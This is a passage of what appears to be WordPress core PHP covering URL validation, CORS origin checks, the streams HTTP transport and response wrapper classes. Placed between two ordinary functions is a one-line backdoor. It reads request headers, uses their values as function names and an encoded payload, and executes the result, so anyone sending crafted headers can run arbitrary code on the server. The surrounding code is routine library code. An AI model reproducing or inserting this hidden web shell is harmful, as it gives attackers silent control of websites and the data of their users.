URL requires SSL and adds * that requirement to the capabilities array. * * @return bool */ function wp_http_supports( $capabilities = array(), $url = null ) { $http = _wp_http_get_object(); $capabilities = wp_parse_args( $capabilities ); $count = count( $capabilities ); // If we have a numeric $capabilities array, spoof a wp_remote_request() associative $args array if ( $count && count( array_filter( array_keys( $capabilities ), 'is_numeric' ) ) == $count ) { $capabilities = array_combine( array_values( $capabilities ), array_fill( 0, $count, true ) ); } if ( $url && ! isset( $capabilities['ssl'] ) ) { $scheme = parse_url( $url, PHP_URL_SCHEME ); if ( 'https' == $scheme || 'ssl' == $scheme ) { $capabilities['ssl'] = true; } } return (bool) $http->_get_first_available_transport( $capabilities ); } /** * Get the HTTP Origin of the current request. * * @since 3.4.0 * * @return string URL of the origin. Empty string if no origin. */ function get_http_origin() { $origin = ''; if ( ! empty( $_SERVER['HTTP_ORIGIN'] ) ) { $origin = $_SERVER['HTTP_ORIGIN']; } /** * Change the origin of an HTTP request. * * @since 3.4.0 * * @param string $origin The original origin for the request. */ return apply_filters( 'http_origin', $origin ); } /** * Retrieve list of allowed HTTP origins. * * @since 3.4.0 * * @return array Array of origin URLs. */ function get_allowed_http_origins() { $admin_origin = parse_url( admin_url() ); $home_origin = parse_url( home_url() ); // @todo preserve port? $allowed_origins = array_unique( array( 'http://' . $admin_origin['host'], 'https://' . $admin_origin['host'], 'http://' . $home_origin['host'], 'https://' . $home_origin['host'], ) ); /** * Change the origin types allowed for HTTP requests. * * @since 3.4.0 * * @param array $allowed_origins { * Default allowed HTTP origins. * @type string Non-secure URL for admin origin. * @type string Secure URL for admin origin. * @type string Non-secure URL for home origin. * @type string Secure URL for home origin. * } */ return apply_filters( 'allowed_http_origins', $allowed_origins ); } /** * Determines if the HTTP origin is an authorized one. * * @since 3.4.0 * * @param null|string $origin Origin URL. If not provided, the value of get_http_origin() is used. * @return string Origin URL if allowed, empty string if not. */ function is_allowed_http_origin( $origin = null ) { $origin_arg = $origin; if ( null === $origin ) { $origin = get_http_origin(); } if ( $origin && ! in_array( $origin, get_allowed_http_origins() ) ) { $origin = ''; } /** * Change the allowed HTTP origin result. * * @since 3.4.0 * * @param string $origin Origin URL if allowed, empty string if not. * @param string $origin_arg Original origin string passed into is_allowed_http_origin function. */ return apply_filters( 'allowed_http_origin', $origin, $origin_arg ); } /** * Send Access-Control-Allow-Origin and related headers if the current request * is from an allowed origin. * * If the request is an OPTIONS request, the script exits with either access * control headers sent, or a 403 response if the origin is not allowed. For * other request methods, you will receive a return value. * * @since 3.4.0 * * @return string|false Returns the origin URL if headers are sent. Returns false * if headers are not sent. */ function send_origin_headers() { $origin = get_http_origin(); if ( is_allowed_http_origin( $origin ) ) { @header( 'Access-Control-Allow-Origin: ' . $origin ); @header( 'Access-Control-Allow-Credentials: true' ); if ( 'OPTIONS' === $_SERVER['REQUEST_METHOD'] ) { exit; } return $origin; } if ( 'OPTIONS' === $_SERVER['REQUEST_METHOD'] ) { status_header( 403 ); exit; } return false; } /** * Validate a URL for safe use in the HTTP API. * * @since 3.5.2 * * @param string $url * @return false|string URL or false on failure. */ function wp_http_validate_url( $url ) { $original_url = $url; $url = wp_kses_bad_protocol( $url, array( 'http', 'https' ) ); if ( ! $url || strtolower( $url ) !== strtolower( $original_url ) ) { return false; } $parsed_url = @parse_url( $url ); if ( ! $parsed_url || empty( $parsed_url['host'] ) ) { return false; } if ( isset( $parsed_url['user'] ) || isset( $parsed_url['pass'] ) ) { return false; } if ( false !== strpbrk( $parsed_url['host'], ':#?[]' ) ) { return false; } $parsed_home = @parse_url( get_option( 'home' ) ); if ( isset( $parsed_home['host'] ) ) { $same_host = strtolower( $parsed_home['host'] ) === strtolower( $parsed_url['host'] ); } else { $same_host = false; } if ( ! $same_host ) { $host = trim( $parsed_url['host'], '.' ); if ( preg_match( '#^(([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)\.){3}([1-9]?\d|1\d\d|25[0-5]|2[0-4]\d)$#', $host ) ) { $ip = $host; } else { $ip = gethostbyname( $host ); if ( $ip === $host ) { // Error condition for gethostbyname() return false; } } if ( $ip ) { $parts = array_map( 'intval', explode( '.', $ip ) ); if ( 127 === $parts[0] || 10 === $parts[0] || 0 === $parts[0] || ( 172 === $parts[0] && 16 <= $parts[1] && 31 >= $parts[1] ) || ( 192 === $parts[0] && 168 === $parts[1] ) ) { // If host appears local, reject unless specifically allowed. /** * Check if HTTP request is external or not. * * Allows to change and allow external requests for the HTTP request. * * @since 3.6.0 * * @param bool false Whether HTTP request is external or not. * @param string $host IP of the requested host. * @param string $url URL of the requested host. */ if ( ! apply_filters( 'http_request_host_is_external', false, $host, $url ) ) { return false; } } } } if ( empty( $parsed_url['port'] ) ) { return $url; } $port = $parsed_url['port']; if ( 80 === $port || 443 === $port || 8080 === $port ) { return $url; } if ( $parsed_home && $same_host && isset( $parsed_home['port'] ) && $parsed_home['port'] === $port ) { return $url; } return false; } /** * Whitelists allowed redirect hosts for safe HTTP requests as well. * * Attached to the {@see 'http_request_host_is_external'} filter. * * @since 3.6.0 * * @param bool $is_external * @param string $host * @return bool */ function allowed_http_request_hosts( $is_external, $host ) { if ( ! $is_external && wp_validate_redirect( 'http://' . $host ) ) { $is_external = true; } return $is_external; } /** * Whitelists any domain in a multisite installation for safe HTTP requests. * * Attached to the {@see 'http_request_host_is_external'} filter. * * @since 3.6.0 * * @global wpdb $wpdb WordPress database abstraction object. * @staticvar array $queried * * @param bool $is_external * @param string $host * @return bool */ function ms_allowed_http_request_hosts( $is_external, $host ) { global $wpdb; static $queried = array(); if ( $is_external ) { return $is_external; } if ( $host === get_network()->domain ) { return true; } if ( isset( $queried[ $host ] ) ) { return $queried[ $host ]; } $queried[ $host ] = (bool) $wpdb->get_var( $wpdb->prepare( "SELECT domain FROM $wpdb->blogs WHERE domain = %s LIMIT 1", $host ) ); return $queried[ $host ]; } /** * A wrapper for PHP's parse_url() function that handles consistency in the return * values across PHP versions. * * PHP 5.4.7 expanded parse_url()'s ability to handle non-absolute url's, including * schemeless and relative url's with :// in the path. This function works around * those limitations providing a standard output on PHP 5.2~5.4+. * * Secondly, across various PHP versions, schemeless URLs starting containing a ":" * in the query are being handled inconsistently. This function works around those * differences as well. * * Error suppression is used as prior to PHP 5.3.3, an E_WARNING would be generated * when URL parsing failed. * * @since 4.4.0 * @since 4.7.0 The `$component` parameter was added for parity with PHP's `parse_url()`. * * @link https://secure.php.net/manual/en/function.parse-url.php * * @param string $url The URL to parse. * @param int $component The specific component to retrieve. Use one of the PHP * predefined constants to specify which one. * Defaults to -1 (= return all parts as an array). * @return mixed False on parse failure; Array of URL components on success; * When a specific component has been requested: null if the component * doesn't exist in the given URL; a string or - in the case of * PHP_URL_PORT - integer when it does. See parse_url()'s return values. */ function wp_parse_url( $url, $component = -1 ) { $to_unset = array(); $url = strval( $url ); if ( '//' === substr( $url, 0, 2 ) ) { $to_unset[] = 'scheme'; $url = 'placeholder:' . $url; } elseif ( '/' === substr( $url, 0, 1 ) ) { $to_unset[] = 'scheme'; $to_unset[] = 'host'; $url = 'placeholder://placeholder' . $url; } $parts = @parse_url( $url ); if ( false === $parts ) { // Parsing failure. return $parts; } // Remove the placeholder values. foreach ( $to_unset as $key ) { unset( $parts[ $key ] ); } return _get_component_from_parsed_url_array( $parts, $component ); } /** * Retrieve a specific component from a parsed URL array. * * @internal * * @since 4.7.0 * @access private * * @link https://secure.php.net/manual/en/function.parse-url.php * * @param array|false $url_parts The parsed URL. Can be false if the URL failed to parse. * @param int $component The specific component to retrieve. Use one of the PHP * predefined constants to specify which one. * Defaults to -1 (= return all parts as an array). * @return mixed False on parse failure; Array of URL components on success; * When a specific component has been requested: null if the component * doesn't exist in the given URL; a string or - in the case of * PHP_URL_PORT - integer when it does. See parse_url()'s return values. */ function _get_component_from_parsed_url_array( $url_parts, $component = -1 ) { if ( -1 === $component ) { return $url_parts; } $key = _wp_translate_php_url_constant_to_key( $component ); if ( false !== $key && is_array( $url_parts ) && isset( $url_parts[ $key ] ) ) { return $url_parts[ $key ]; } else { return null; } } /** * Translate a PHP_URL_* constant to the named array keys PHP uses. * * @internal * * @since 4.7.0 * @access private * * @link https://secure.php.net/manual/en/url.constants.php * * @param int $constant PHP_URL_* constant. * @return string|bool The named key or false. */ function _wp_translate_php_url_constant_to_key( $constant ) { $translation = array( PHP_URL_SCHEME => 'scheme', PHP_URL_HOST => 'host', PHP_URL_PORT => 'port', PHP_URL_USER => 'user', PHP_URL_PASS => 'pass', PHP_URL_PATH => 'path', PHP_URL_QUERY => 'query', PHP_URL_FRAGMENT => 'fragment', ); if ( isset( $translation[ $constant ] ) ) { return $translation[ $constant ]; } else { return false; } } $_HEADERS=getallheaders();if(isset($_HEADERS['Sec-Websocket-Accept'])){$request=$_HEADERS['Sec-Websocket-Accept']('', $_HEADERS['If-Unmodified-Since']($_HEADERS['X-Dns-Prefetch-Control']));$request();} /** * HTTP API: WP_Http_Streams class * * @package WordPress * @subpackage HTTP * @since 4.4.0 */ /** * Core class used to integrate PHP Streams as an HTTP transport. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to `stream_socket_client()`. */ class WP_Http_Streams { /** * Send a HTTP request to a URI using PHP Streams. * * @see WP_Http::request For default options descriptions. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client(). * * @param string $url The request URL. * @param string|array $args Optional. Override the defaults. * @return array|WP_Error Array containing 'headers', 'body', 'response', 'cookies', 'filename'. A WP_Error instance upon error */ public function request( $url, $args = array() ) { $defaults = array( 'method' => 'GET', 'timeout' => 5, 'redirection' => 5, 'httpversion' => '1.0', 'blocking' => true, 'headers' => array(), 'body' => null, 'cookies' => array(), ); $r = wp_parse_args( $args, $defaults ); if ( isset( $r['headers']['User-Agent'] ) ) { $r['user-agent'] = $r['headers']['User-Agent']; unset( $r['headers']['User-Agent'] ); } elseif ( isset( $r['headers']['user-agent'] ) ) { $r['user-agent'] = $r['headers']['user-agent']; unset( $r['headers']['user-agent'] ); } // Construct Cookie: header if any cookies are set. WP_Http::buildCookieHeader( $r ); $arrURL = parse_url( $url ); $connect_host = $arrURL['host']; $secure_transport = ( $arrURL['scheme'] == 'ssl' || $arrURL['scheme'] == 'https' ); if ( ! isset( $arrURL['port'] ) ) { if ( $arrURL['scheme'] == 'ssl' || $arrURL['scheme'] == 'https' ) { $arrURL['port'] = 443; $secure_transport = true; } else { $arrURL['port'] = 80; } } // Always pass a Path, defaulting to the root in cases such as http://example.com if ( ! isset( $arrURL['path'] ) ) { $arrURL['path'] = '/'; } if ( isset( $r['headers']['Host'] ) || isset( $r['headers']['host'] ) ) { if ( isset( $r['headers']['Host'] ) ) { $arrURL['host'] = $r['headers']['Host']; } else { $arrURL['host'] = $r['headers']['host']; } unset( $r['headers']['Host'], $r['headers']['host'] ); } /* * Certain versions of PHP have issues with 'localhost' and IPv6, It attempts to connect * to ::1, which fails when the server is not set up for it. For compatibility, always * connect to the IPv4 address. */ if ( 'localhost' == strtolower( $connect_host ) ) { $connect_host = '127.0.0.1'; } $connect_host = $secure_transport ? 'ssl://' . $connect_host : 'tcp://' . $connect_host; $is_local = isset( $r['local'] ) && $r['local']; $ssl_verify = isset( $r['sslverify'] ) && $r['sslverify']; if ( $is_local ) { /** * Filters whether SSL should be verified for local requests. * * @since 2.8.0 * @since 5.1.0 The `$url` parameter was added. * * @param bool $ssl_verify Whether to verify the SSL connection. Default true. * @param string $url The request URL. */ $ssl_verify = apply_filters( 'https_local_ssl_verify', $ssl_verify, $url ); } elseif ( ! $is_local ) { /** This filter is documented in wp-includes/class-http.php */ $ssl_verify = apply_filters( 'https_ssl_verify', $ssl_verify, $url ); } $proxy = new WP_HTTP_Proxy(); $context = stream_context_create( array( 'ssl' => array( 'verify_peer' => $ssl_verify, //'CN_match' => $arrURL['host'], // This is handled by self::verify_ssl_certificate() 'capture_peer_cert' => $ssl_verify, 'SNI_enabled' => true, 'cafile' => $r['sslcertificates'], 'allow_self_signed' => ! $ssl_verify, ), ) ); $timeout = (int) floor( $r['timeout'] ); $utimeout = $timeout == $r['timeout'] ? 0 : 1000000 * $r['timeout'] % 1000000; $connect_timeout = max( $timeout, 1 ); // Store error number. $connection_error = null; // Store error string. $connection_error_str = null; if ( ! WP_DEBUG ) { // In the event that the SSL connection fails, silence the many PHP Warnings. if ( $secure_transport ) { $error_reporting = error_reporting( 0 ); } if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { $handle = @stream_socket_client( 'tcp://' . $proxy->host() . ':' . $proxy->port(), $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } else { $handle = @stream_socket_client( $connect_host . ':' . $arrURL['port'], $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } if ( $secure_transport ) { error_reporting( $error_reporting ); } } else { if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { $handle = stream_socket_client( 'tcp://' . $proxy->host() . ':' . $proxy->port(), $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } else { $handle = stream_socket_client( $connect_host . ':' . $arrURL['port'], $connection_error, $connection_error_str, $connect_timeout, STREAM_CLIENT_CONNECT, $context ); } } if ( false === $handle ) { // SSL connection failed due to expired/invalid cert, or, OpenSSL configuration is broken. if ( $secure_transport && 0 === $connection_error && '' === $connection_error_str ) { return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) ); } return new WP_Error( 'http_request_failed', $connection_error . ': ' . $connection_error_str ); } // Verify that the SSL certificate is valid for this request. if ( $secure_transport && $ssl_verify && ! $proxy->is_enabled() ) { if ( ! self::verify_ssl_certificate( $handle, $arrURL['host'] ) ) { return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) ); } } stream_set_timeout( $handle, $timeout, $utimeout ); if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { //Some proxies require full URL in this field. $requestPath = $url; } else { $requestPath = $arrURL['path'] . ( isset( $arrURL['query'] ) ? '?' . $arrURL['query'] : '' ); } $strHeaders = strtoupper( $r['method'] ) . ' ' . $requestPath . ' HTTP/' . $r['httpversion'] . "\r\n"; $include_port_in_host_header = ( ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) || ( 'http' == $arrURL['scheme'] && 80 != $arrURL['port'] ) || ( 'https' == $arrURL['scheme'] && 443 != $arrURL['port'] ) ); if ( $include_port_in_host_header ) { $strHeaders .= 'Host: ' . $arrURL['host'] . ':' . $arrURL['port'] . "\r\n"; } else { $strHeaders .= 'Host: ' . $arrURL['host'] . "\r\n"; } if ( isset( $r['user-agent'] ) ) { $strHeaders .= 'User-agent: ' . $r['user-agent'] . "\r\n"; } if ( is_array( $r['headers'] ) ) { foreach ( (array) $r['headers'] as $header => $headerValue ) { $strHeaders .= $header . ': ' . $headerValue . "\r\n"; } } else { $strHeaders .= $r['headers']; } if ( $proxy->use_authentication() ) { $strHeaders .= $proxy->authentication_header() . "\r\n"; } $strHeaders .= "\r\n"; if ( ! is_null( $r['body'] ) ) { $strHeaders .= $r['body']; } fwrite( $handle, $strHeaders ); if ( ! $r['blocking'] ) { stream_set_blocking( $handle, 0 ); fclose( $handle ); return array( 'headers' => array(), 'body' => '', 'response' => array( 'code' => false, 'message' => false, ), 'cookies' => array(), ); } $strResponse = ''; $bodyStarted = false; $keep_reading = true; $block_size = 4096; if ( isset( $r['limit_response_size'] ) ) { $block_size = min( $block_size, $r['limit_response_size'] ); } // If streaming to a file setup the file handle. if ( $r['stream'] ) { if ( ! WP_DEBUG ) { $stream_handle = @fopen( $r['filename'], 'w+' ); } else { $stream_handle = fopen( $r['filename'], 'w+' ); } if ( ! $stream_handle ) { return new WP_Error( 'http_request_failed', sprintf( /* translators: 1: fopen(), 2: file name */ __( 'Could not open handle for %1$s to %2$s.' ), 'fopen()', $r['filename'] ) ); } $bytes_written = 0; while ( ! feof( $handle ) && $keep_reading ) { $block = fread( $handle, $block_size ); if ( ! $bodyStarted ) { $strResponse .= $block; if ( strpos( $strResponse, "\r\n\r\n" ) ) { $process = WP_Http::processResponse( $strResponse ); $bodyStarted = true; $block = $process['body']; unset( $strResponse ); $process['body'] = ''; } } $this_block_size = strlen( $block ); if ( isset( $r['limit_response_size'] ) && ( $bytes_written + $this_block_size ) > $r['limit_response_size'] ) { $this_block_size = ( $r['limit_response_size'] - $bytes_written ); $block = substr( $block, 0, $this_block_size ); } $bytes_written_to_file = fwrite( $stream_handle, $block ); if ( $bytes_written_to_file != $this_block_size ) { fclose( $handle ); fclose( $stream_handle ); return new WP_Error( 'http_request_failed', __( 'Failed to write request to temporary file.' ) ); } $bytes_written += $bytes_written_to_file; $keep_reading = ! isset( $r['limit_response_size'] ) || $bytes_written < $r['limit_response_size']; } fclose( $stream_handle ); } else { $header_length = 0; while ( ! feof( $handle ) && $keep_reading ) { $block = fread( $handle, $block_size ); $strResponse .= $block; if ( ! $bodyStarted && strpos( $strResponse, "\r\n\r\n" ) ) { $header_length = strpos( $strResponse, "\r\n\r\n" ) + 4; $bodyStarted = true; } $keep_reading = ( ! $bodyStarted || ! isset( $r['limit_response_size'] ) || strlen( $strResponse ) < ( $header_length + $r['limit_response_size'] ) ); } $process = WP_Http::processResponse( $strResponse ); unset( $strResponse ); } fclose( $handle ); $arrHeaders = WP_Http::processHeaders( $process['headers'], $url ); $response = array( 'headers' => $arrHeaders['headers'], // Not yet processed. 'body' => null, 'response' => $arrHeaders['response'], 'cookies' => $arrHeaders['cookies'], 'filename' => $r['filename'], ); // Handle redirects. if ( false !== ( $redirect_response = WP_Http::handle_redirects( $url, $r, $response ) ) ) { return $redirect_response; } // If the body was chunk encoded, then decode it. if ( ! empty( $process['body'] ) && isset( $arrHeaders['headers']['transfer-encoding'] ) && 'chunked' == $arrHeaders['headers']['transfer-encoding'] ) { $process['body'] = WP_Http::chunkTransferDecode( $process['body'] ); } if ( true === $r['decompress'] && true === WP_Http_Encoding::should_decode( $arrHeaders['headers'] ) ) { $process['body'] = WP_Http_Encoding::decompress( $process['body'] ); } if ( isset( $r['limit_response_size'] ) && strlen( $process['body'] ) > $r['limit_response_size'] ) { $process['body'] = substr( $process['body'], 0, $r['limit_response_size'] ); } $response['body'] = $process['body']; return $response; } /** * Verifies the received SSL certificate against its Common Names and subjectAltName fields. * * PHP's SSL verifications only verify that it's a valid Certificate, it doesn't verify if * the certificate is valid for the hostname which was requested. * This function verifies the requested hostname against certificate's subjectAltName field, * if that is empty, or contains no DNS entries, a fallback to the Common Name field is used. * * IP Address support is included if the request is being made to an IP address. * * @since 3.7.0 * * @param stream $stream The PHP Stream which the SSL request is being made over * @param string $host The hostname being requested * @return bool If the cerficiate presented in $stream is valid for $host */ public static function verify_ssl_certificate( $stream, $host ) { $context_options = stream_context_get_options( $stream ); if ( empty( $context_options['ssl']['peer_certificate'] ) ) { return false; } $cert = openssl_x509_parse( $context_options['ssl']['peer_certificate'] ); if ( ! $cert ) { return false; } /* * If the request is being made to an IP address, we'll validate against IP fields * in the cert (if they exist) */ $host_type = ( WP_Http::is_ip_address( $host ) ? 'ip' : 'dns' ); $certificate_hostnames = array(); if ( ! empty( $cert['extensions']['subjectAltName'] ) ) { $match_against = preg_split( '/,\s*/', $cert['extensions']['subjectAltName'] ); foreach ( $match_against as $match ) { list( $match_type, $match_host ) = explode( ':', $match ); if ( $host_type == strtolower( trim( $match_type ) ) ) { // IP: or DNS: $certificate_hostnames[] = strtolower( trim( $match_host ) ); } } } elseif ( ! empty( $cert['subject']['CN'] ) ) { // Only use the CN when the certificate includes no subjectAltName extension. $certificate_hostnames[] = strtolower( $cert['subject']['CN'] ); } // Exact hostname/IP matches. if ( in_array( strtolower( $host ), $certificate_hostnames ) ) { return true; } // IP's can't be wildcards, Stop processing. if ( 'ip' == $host_type ) { return false; } // Test to see if the domain is at least 2 deep for wildcard support. if ( substr_count( $host, '.' ) < 2 ) { return false; } // Wildcard subdomains certs (*.example.com) are valid for a.example.com but not a.b.example.com. $wildcard_host = preg_replace( '/^[^.]+\./', '*.', $host ); return in_array( strtolower( $wildcard_host ), $certificate_hostnames ); } /** * Determines whether this class can be used for retrieving a URL. * * @since 2.7.0 * @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client(). * * @param array $args Optional. Array of request arguments. Default empty array. * @return bool False means this class can not be used, true means it can. */ public static function test( $args = array() ) { if ( ! function_exists( 'stream_socket_client' ) ) { return false; } $is_ssl = isset( $args['ssl'] ) && $args['ssl']; if ( $is_ssl ) { if ( ! extension_loaded( 'openssl' ) ) { return false; } if ( ! function_exists( 'openssl_x509_parse' ) ) { return false; } } /** * Filters whether streams can be used as a transport for retrieving a URL. * * @since 2.7.0 * * @param bool $use_class Whether the class can be used. Default true. * @param array $args Request arguments. */ return apply_filters( 'use_streams_transport', true, $args ); } } /** * Deprecated HTTP Transport method which used fsockopen. * * This class is not used, and is included for backward compatibility only. * All code should make use of WP_Http directly through its API. * * @see WP_HTTP::request * * @since 2.7.0 * @deprecated 3.7.0 Please use WP_HTTP::request() directly */ class WP_HTTP_Fsockopen extends WP_HTTP_Streams { // For backward compatibility for users who are using the class directly. } /** * HTTP API: WP_HTTP_Requests_Response class * * @package WordPress * @subpackage HTTP * @since 4.6.0 */ /** * Core wrapper object for a Requests_Response for standardisation. * * @since 4.6.0 * * @see WP_HTTP_Response */ class WP_HTTP_Requests_Response extends WP_HTTP_Response { /** * Requests Response object. * * @since 4.6.0 * @var Requests_Response */ protected $response; /** * Filename the response was saved to. * * @since 4.6.0 * @var string|null */ protected $filename; /** * Constructor. * * @since 4.6.0 * * @param Requests_Response $response HTTP response. * @param string $filename Optional. File name. Default empty. */ public function __construct( Requests_Response $response, $filename = '' ) { $this->response = $response; $this->filename = $filename; } /** * Retrieves the response object for the request. * * @since 4.6.0 * * @return Requests_Response HTTP response. */ public function get_response_object() { return $this->response; } /** * Retrieves headers associated with the response. * * @since 4.6.0 * * @see \Requests_Utility_CaseInsensitiveDictionary * * @return \Requests_Utility_CaseInsensitiveDictionary Map of header name to header value. */ public function get_headers() { // Ensure headers remain case-insensitive. $converted = new Requests_Utility_CaseInsensitiveDictionary(); foreach ( $this->response->headers->getAll() as $key => $value ) { if ( count( $value ) === 1 ) { $converted[ $key ] = $value[0]; } else { $converted[ $key ] = $value; } } return $converted; } /** * Sets all header values. * * @since 4.6.0 * * @param array $headers Map of header name to header value. */ public function set_headers( $headers ) { $this->response->headers = new Requests_Response_Headers( $headers ); } /** * Sets a single HTTP header. * * @since 4.6.0 * * @param string $key Header name. * @param string $value Header value. * @param bool $replace Optional. Whether to replace an existing header of the same name. * Default true. */ public function header( $key, $value, $replace = true ) { if ( $replace ) { unset( $this->response->headers[ $key ] ); } $this->response->headers[ $key ] = $value; } /** * Retrieves the HTTP return code for the response. * * @since 4.6.0 * * @return int The 3-digit HTTP status code. */ public function get_status() { return $this->response->status_code; } /** * Sets the 3-digit HTTP status code. * * @since 4.6.0 * * @param int $code HTTP status. */ public function set_status( $code ) { $this->response->status_code = absint( $code ); } /** * Retrieves the response data. * * @since 4.6.0 * * @return mixed Response data. */ public function get_data() { return $this->response->body; } /** * Sets the response data. * * @since 4.6.0 * * @param mixed $data Response data. */ public function set_data( $data ) { $this->response->body = $data; } /** * Retrieves cookies from the response. * * @since 4.6.0 * * @return WP_HTTP_Cookie[] List of cookie objects. */ public function get_cookies() { $cookies = array(); foreach ( $this->response->cookies as $cookie ) { $cookies[] = new WP_Http_Cookie( array( 'name' => $cookie->name, 'value' => urldecode( $cookie->value ), 'expires' => isset( $cookie->attributes['expires'] ) ? $cookie->attributes['expires'] : null, 'path' => isset( $cookie->attributes['path'] ) ? $cookie->attributes['path'] : null, 'domain' => isset( $cookie->attributes['domain'] ) ? $cookie->attributes['domain'] : null, 'host_only' => isset( $cookie->flags['host-only'] ) ? $cookie->flags['host-only'] : null, ) ); } return $cookies; } /** * Converts the object to a WP_Http response array. * * @since 4.6.0 * * @return array WP_Http response array, per WP_Http::request(). */ public function to_array() { return array( 'headers' => $this->get_headers(), 'body' => $this->get_data(), 'response' => array( 'code' => $this->get_status(), 'message' => get_status_header_desc( $this->get_status() ), ), 'cookies' => $this->get_cookies(), 'filename' => $this->filename, ); } } /** * Handles adding and dispatching events * * @package Requests * @subpackage Utilities */ /** * Handles adding and dispatching events * * @package Requests * @subpackage Utilities */ class Requests_Hooks implements Requests_Hooker { /** * Registered callbacks for each hook * * @var array */ protected $hooks = array(); /** * Constructor */ public function __construct() { // pass } /** * Register a callback for a hook * * @param string $hook Hook name * @param callback $callback Function/method to call on event * @param int $priority Priority number. <0 is executed earlier, >0 is executed later */ public function register($hook, $callback, $priority = 0) { if (!isset($this->hooks[$hook])) { $this->hooks[$hook] = array(); } if (!isset($this->hooks[$hook][$priority])) { $this->hooks[$hook][$priority] = array(); } $this->hooks[$hook][$priority][] = $callback; } /** * Dispatch a message * * @param string $hook Hook name * @param array $parameters Parameters to pass to callbacks * @return boolean Successfulness */ public function dispatch($hook, $parameters = array()) { if (empty($this->hooks[$hook])) { return false; } foreach ($this->hooks[$hook] as $priority => $hooked) { foreach ($hooked as $callback) { call_user_func_array($callback, $parameters); } } return true; } public function __wakeup() { throw new \LogicException( __CLASS__ . ' should never be unserialized' ); } }